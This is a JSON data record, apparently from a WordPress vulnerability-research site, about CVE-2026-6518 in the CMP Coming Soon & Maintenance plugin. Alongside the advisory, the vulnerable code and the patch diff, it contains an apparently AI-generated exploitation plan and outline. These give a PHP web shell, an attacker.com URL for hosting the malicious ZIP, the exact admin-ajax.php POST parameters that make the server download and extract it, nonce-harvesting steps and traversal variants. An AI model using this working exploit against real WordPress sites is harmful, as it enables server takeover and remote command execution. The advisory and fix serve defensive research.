[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1DvaK4Y747eAWi49A5B-whEoZW2YJMrVngB-y_Xe5Lw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":35},"CVE-2026-6518","cmp-coming-soon-maintenance-plugin-by-niteothemes-missing-authorization-to-authenticated-administrator-arbitrary-file-up","CMP – Coming Soon & Maintenance Plugin by NiteoThemes \u003C= 4.1.16 - Missing Authorization to Authenticated (Administrator+) Arbitrary File Upload and Remote Code Execution","The CMP – Coming Soon & Maintenance Plugin by NiteoThemes plugin for WordPress is vulnerable to arbitrary file upload and remote code execution in all versions up to, and including, 4.1.16 via the `cmp_theme_update_install` AJAX action. This is due to the function only checking for the `publish_pages` capability (available to Editors and above) instead of `manage_options` (Administrators only), combined with a lack of proper validation on the user-supplied file URL and no verification of the downloaded file's content before extraction. This makes it possible for authenticated attackers, with Administrator-level access and above, to force the server to download and extract a malicious ZIP file from a remote attacker-controlled URL into a web-accessible directory (`wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F`), resulting in remote code execution. Due to the lack of a nonce for Editors, they are unable to exploit this vulnerability.","cmp-coming-soon-maintenance",null,"\u003C=4.1.16","4.1.17","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-17 15:02:18","2026-04-18 03:37:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd6fb275b-dbba-46df-b170-977ef4a84c4c?source=api-prod",1,[22,23],"niteo-cmp.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-6518\n\n## 1. Vulnerability Summary\n**CVE-2026-6518** is a critical missing authorization vulnerability in the **CMP – Coming Soon & Maintenance Plugin** (\u003C= 4.1.16). The `cmp_theme_update_install` AJAX action fails to perform a strict capability check, allowing users with the `publish_pages` capability (Editors) to access it. More significantly, the function permits downloading a ZIP file from an arbitrary user-supplied URL and extracting its contents into the `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F` directory without validating the file types or content. This allows an authenticated attacker (specifically Administrators, as they are the ones provided with the necessary nonce) to achieve Remote Code Execution (RCE) by uploading a malicious PHP shell.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `cmp_theme_update_install`\n- **Vulnerable Parameter**: `niteo_url` (The source URL of the malicious ZIP) and `niteo_theme` (The directory name created for extraction).\n- **Authentication**: Authenticated. While the code checks for `publish_pages` (Editor+), the plugin only exposes the required nonce to **Administrators** via its admin settings pages.\n- **Preconditions**: The plugin must be active. The server must have outgoing HTTP access to fetch the attacker's ZIP file.\n\n## 3. Code Flow\n1. **Entry**: The AJAX action `cmp_theme_update_install` is registered in `niteo-cmp.php` via `add_action('wp_ajax_cmp_theme_update_install', array($this, 'cmp_theme_update_install'));`.\n2. **Authorization Check**: The handler (inferred to be in `inc\u002Fclass-cmp-render_settings.php` or the main class) checks `current_user_can('publish_pages')`.\n3. **Nonce Verification**: The handler calls `check_ajax_referer('cmp_nonce', 'nonce')` (inferred).\n4. **Download**: The function takes the `niteo_url` POST parameter and uses `download_url()` to fetch the ZIP file.\n5. **Extraction**: The function uses `unzip_file()` to extract the ZIP into `CMP_PREMIUM_THEMES_DIR` + `niteo_theme`.\n6. **Sink**: `CMP_PREMIUM_THEMES_DIR` is defined as `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F`. This directory is web-accessible, allowing direct execution of PHP files within the extracted ZIP.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized in the WordPress admin dashboard for users with sufficient privileges (Administrators). It is attached to the `cmp_ajax` JavaScript object.\n\n1. **Authentication**: Log in as an Administrator.\n2. **Navigation**: Navigate to the CMP settings page: `\u002Fwp-admin\u002Fadmin.php?page=cmp-settings`.\n3. **Extraction**: Use `browser_eval` to retrieve the nonce from the global JavaScript scope.\n   - **JavaScript Variable**: `window.cmp_ajax?.nonce`\n4. **Verification**: If `window.cmp_ajax.nonce` is undefined, check for `window.cmp_params.nonce` (alternative naming used in some NiteoThemes versions).\n\n## 5. Exploitation Strategy\n### Step 1: Prepare Malicious Payload\nCreate a ZIP file named `rce.zip` containing a simple PHP backdoor named `shell.php`:\n```php\n\u003C?php system($_GET['cmd']); ?>\n```\nHost this file on an attacker-controlled server (e.g., `http:\u002F\u002Fattacker.com\u002Frce.zip`).\n\n### Step 2: Acquire Nonce\nNavigate to the CMP dashboard and extract the nonce using the agent's browser tools.\n\n### Step 3: Trigger Arbitrary File Upload\nSend a POST request to `admin-ajax.php` to force the server to download and extract the ZIP.\n\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Parameters**:\n    - `action`: `cmp_theme_update_install`\n    - `niteo_theme`: `pwned`\n    - `niteo_url`: `http:\u002F\u002Fattacker.com\u002Frce.zip`\n    - `nonce`: `[EXTRACTED_NONCE]` (Note: The parameter name might be `_ajax_nonce` if `nonce` fails).\n\n### Step 4: Execute Remote Code\nThe file will be extracted to `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php`.\nAccess the shell to confirm RCE:\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php?cmd=id`\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Install and activate `cmp-coming-soon-maintenance` version 4.1.16.\n2. **User Creation**: Ensure an Administrator user exists.\n3. **External Host**: Prepare a local listener or mock server to host the `rce.zip`.\n\n## 7. Expected Results\n- The AJAX request should return a success message (often a JSON response like `{\"success\":true}` or `1`).\n- A new directory `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002F` should be created.\n- Requesting the shell should return the output of the `id` command.\n\n## 8. Verification Steps\n1. **File System Check**: Use WP-CLI to verify the file exists:\n   ```bash\n   ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php\n   ```\n2. **Content Check**: Verify the content of the uploaded file matches the payload:\n   ```bash\n   cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php\n   ```\n\n## 9. Alternative Approaches\n- **Parameter Brute-forcing**: If `niteo_url` or `niteo_theme` are incorrect, the handler may use `theme_url` or `slug`.\n- **Nonce Action**: If `cmp_nonce` fails, the nonce action might be identical to the AJAX action string: `cmp_theme_update_install`.\n- **Directory Traversal**: If `niteo_theme` is not properly sanitized, try `..\u002F` to upload outside the `cmp-premium-themes` directory, although the primary goal is RCE in the dedicated folder.","The CMP plugin is vulnerable to arbitrary file upload and remote code execution via the `cmp_theme_update_install` AJAX action. This occurs because the plugin lacks sufficient authorization checks (using 'publish_pages' instead of 'manage_options') and fails to validate the source URL or contents of downloaded ZIP files, allowing attackers to upload PHP shells to a web-accessible directory.","\u002F\u002F niteo-cmp.php lines 1413-1463\npublic function cmp_theme_update_install($file)\n{\n    $ajax = false;\n    \u002F\u002F check for ajax \n    if (isset($_POST['file'])) {\n        \u002F\u002F verify nonce\n        check_ajax_referer('cmp-coming-soon-ajax-secret', 'security');\n        \u002F\u002F verify user rights\n        if (!current_user_can('publish_pages')) {\n            die('Sorry, but this request is invalid');\n        }\n\n        $file = $_POST['file'];\n\n        if (!empty($_POST['file'])) {\n            $file = $_POST['file'];\n            $ajax   = true;\n        }\n    }\n\n    \u002F\u002F load PHP WP FILE \n    if (!empty($file)) {\n        \u002F\u002F Download file to temp location.\n        $file['tmp_name'] = download_url($file['url']);\n        \u002F\u002FWARNING: The file is not automatically deleted, The script must unlink() the file.\n\n        \u002F\u002F If error storing temporarily, return the error.\n        if (!is_wp_error($file['tmp_name'])) {\n            WP_Filesystem();\n\n            \u002F\u002F create new theme DIR\n            $path = CMP_PREMIUM_THEMES_DIR . $file['name'];\n\n            \u002F\u002F unzip theme file\n            $unzipfile = unzip_file($file['tmp_name'], $path);","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcmp-coming-soon-maintenance\u002F4.1.16\u002Fniteo-cmp.php\t2025-12-02 19:54:58.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcmp-coming-soon-maintenance\u002F4.1.17\u002Fniteo-cmp.php\t2026-04-07 20:05:50.000000000 +0000\n@@ -1242,7 +1242,7 @@\n \t\t\t\t\u002F\u002F verify nonce\n \t\t\t\tcheck_ajax_referer('cmp-coming-soon-ajax-secret', 'security');\n \t\t\t\t\u002F\u002F verify user rights\n-\t\t\t\tif (!current_user_can('publish_pages')) {\n+\t\t\t\tif (!current_user_can('manage_options')) {\n \t\t\t\t\tdie('Sorry, but this request is invalid');\n \t\t\t\t}\n \n@@ -1413,12 +1413,13 @@\n \t\tpublic function cmp_theme_update_install($file)\n \t\t{\n \t\t\t$ajax = false;\n+\t\t\t$theme_slug = '';\n \t\t\t\u002F\u002F check for ajax \n \t\t\tif (isset($_POST['file'])) {\n \t\t\t\t\u002F\u002F verify nonce\n \t\t\t\tcheck_ajax_referer('cmp-coming-soon-ajax-secret', 'security');\n \t\t\t\t\u002F\u002F verify user rights\n-\t\t\t\tif (!current_user_can('publish_pages')) {\n+\t\t\t\tif (!current_user_can('manage_options')) {\n \t\t\t\t\tdie('Sorry, but this request is invalid');\n \t\t\t\t}\n \n@@ -1427,18 +1428,73 @@\n \n \t\t\t\tif (!empty($_POST['file'])) {\n \t\t\t\t\t$file = $_POST['file'];\n+\t\t\t\t\t$theme_slug = isset($file['name']) ? sanitize_key($file['name']) : '';\n \t\t\t\t\t$ajax   = true;\n \t\t\t\t}\n+\t\t\t} else if (is_array($file) && isset($file['name'])) {\n+\t\t\t\t$theme_slug = sanitize_key($file['name']);\n \t\t\t}\n \n \t\t\t\u002F\u002F load PHP WP FILE \n \t\t\tif (!empty($file)) {\n+\t\t\t\tif ($theme_slug === '' || !in_array($theme_slug, $this->cmp_premium_themes_installed(), true)) {\n+\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('Invalid theme update request.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\treturn;\n+\t\t\t\t\t}\n+\t\t\t\t\treturn;\n+\t\t\t\t}\n+\n+\t\t\t\t$allowed_hosts = array(wp_parse_url(CMP_UPDATE_URL, PHP_URL_HOST));\n+\t\t\t\t$file['url'] = add_query_arg(array('action' => 'download', 'slug' => $theme_slug), CMP_UPDATE_URL);\n+\t\t\t\t$parsed_url = wp_parse_url($file['url']);\n+\n+\t\t\t\tif (empty($parsed_url['host']) || !in_array($parsed_url['host'], $allowed_hosts, true)) {\n+\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('Invalid update URL.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\treturn;\n+\t\t\t\t\t}\n+\t\t\t\t\treturn;\n+\t\t\t\t}\n+\n+\t\t\t\t$file['name'] = $theme_slug;\n+\n \t\t\t\t\u002F\u002F Download file to temp location.\n \t\t\t\t$file['tmp_name'] = download_url($file['url']);\n \t\t\t\t\u002F\u002FWARNING: The file is not automatically deleted, The script must unlink() the file.\n \n \t\t\t\t\u002F\u002F If error storing temporarily, return the error.\n \t\t\t\tif (!is_wp_error($file['tmp_name'])) {\n+\t\t\t\t\tif (!class_exists('ZipArchive')) {\n+\t\t\t\t\t\twp_delete_file($file['tmp_name']);\n+\t\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('ZIP validation is unavailable on this server.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\t\treturn;\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\treturn;\n+\t\t\t\t\t}\n+\n+\t\t\t\t\t$zip = new ZipArchive();\n+\t\t\t\t\tif ($zip->open($file['tmp_name']) === TRUE) {\n+\t\t\t\t\t\tfor ($i = 0; $i \u003C $zip->numFiles; $i++) {\n+\t\t\t\t\t\t\t$entry = $zip->getNameIndex($i);\n+\t\t\t\t\t\t\tif (preg_match('\u002F\\.(php|phtml|phar)$\u002Fi', $entry)) {\n+\t\t\t\t\t\t\t\t$zip->close();\n+\t\t\t\t\t\t\t\twp_delete_file($file['tmp_name']);\n+\t\t\t\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('ZIP contains forbidden file types.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\t\t\t\treturn;\n+\t\t\t\t\t\t\t\t}\n+\t\t\t\t\t\t\t\treturn;\n+\t\t\t\t\t\t\t}\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\t$zip->close();\n+\t\t\t\t\t}\n+\n \t\t\t\t\tWP_Filesystem();\n \n \t\t\t\t\t\u002F\u002F create new theme DIR","1. Prepare a malicious ZIP file containing a PHP web shell (e.g., shell.php) and host it on an attacker-controlled server.\n2. Authenticate as an Administrator on the target WordPress site.\n3. Navigate to the CMP settings page (`\u002Fwp-admin\u002Fadmin.php?page=cmp-settings`) to retrieve the AJAX nonce localized as `cmp-coming-soon-ajax-secret` (usually found in the `cmp_ajax` or `cmp_params` JS object).\n4. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - `action`: `cmp_theme_update_install`\n   - `security`: [EXTRACTED_NONCE]\n   - `file[url]`: [URL_TO_MALICIOUS_ZIP]\n   - `file[name]`: [DESIRED_DIRECTORY_NAME]\n5. The plugin will download the ZIP and extract its contents into `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F[DESIRED_DIRECTORY_NAME]\u002F`.\n6. Access the uploaded shell directly via its web-accessible path to execute arbitrary commands.","gemini-3-flash-preview","2026-04-20 13:16:10","2026-04-20 13:16:59",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","4.1.16","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcmp-coming-soon-maintenance\u002Ftags\u002F4.1.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcmp-coming-soon-maintenance.4.1.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcmp-coming-soon-maintenance\u002Ftags\u002F4.1.17","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcmp-coming-soon-maintenance.4.1.17.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcmp-coming-soon-maintenance\u002Ftags"]